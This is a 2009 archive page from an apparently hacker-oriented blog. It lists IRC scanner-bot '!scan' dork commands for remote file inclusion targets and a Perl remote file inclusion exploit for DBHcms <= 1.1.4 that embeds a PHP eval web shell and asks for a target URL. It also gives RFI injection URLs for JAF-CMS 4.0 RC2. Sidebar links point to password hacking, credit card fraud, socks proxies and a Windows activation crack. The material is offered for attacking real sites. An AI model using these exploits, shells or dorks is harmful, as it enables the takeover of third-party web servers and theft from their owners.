01 « January « 2009 « More Than Just A Blog

!scan ///////?cmd&file= “List Users with Pics only?”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement – © 2002-2004 by Christian Scheb – Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal [...]

Tags: bug, dork

DBHcms <= 1.1.4 Remote File Inclusion exploit

Posted by: Bug Dork on: January 1, 2009

In: RFI Vulnerable
Comments Off

#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it’s with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = “http://localhost/s.txt”;

print “#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron – randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?”;
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target [...]

Tags: exploit, RFI, vuln

RFI VULN JAF-CMS 4.0 RC2

Posted by: Bug Dork on: January 1, 2009

In: RFI Vulnerable
Comments Off

Script : JAF-CMS 4.0 RC2
Download : SourceForge.net
Method : GET
Critical : High
Impact : System access

http://localhost/path/module/forum/forum.php?website=[SHELL]
http://localhost/path/module/forum/forum.php?main_dir=[SHELL]
http://localhost/path/module/forum/headlines.php?website=[SHELL]
http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
http://localhost/path/module/forum/main.php?website=[SHELL]
http://localhost/path/module/forum/main.php?main_dir=[SHELL]

milw0rm.com

Tags: cms, exploit, RFI, vuln

M	T	W	T	F	S	S
« Dec				Feb »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

	Spyware Blockers on AVG Anti-Virus Free Edition v8…
	wushuq92 on WarVOX – Wardialing Tool…
	Bobby on Windows Vista Crack WEP wirele…
	mike on Windows Vista Crack WEP wirele…
	pochp on Indian Credit Card Fraud Expos…
	Bug Dork on How to Hack Passwords Using US…
	Eddie on How to Hack Passwords Using US…
	pat on PC Media Antivirus (PCMAV)…
	jon on How to Hack Passwords Using US…
	david on Ultra Hackers 155in1-(AIO…

More Than Just A Blog

Archive for January 1st, 2009

Protected: sock 5 fresh 31 dec 2008

Vista Activator x86 (32 bit) x64 (64 bit) Supports SP1 Automatic

December 2008 bug dork list

DBHcms <= 1.1.4 Remote File Inclusion exploit

RFI VULN JAF-CMS 4.0 RC2

Archives

Latest

Top Posts

Top Clicks

Tags

Blog Stats

Komentar Anda

Links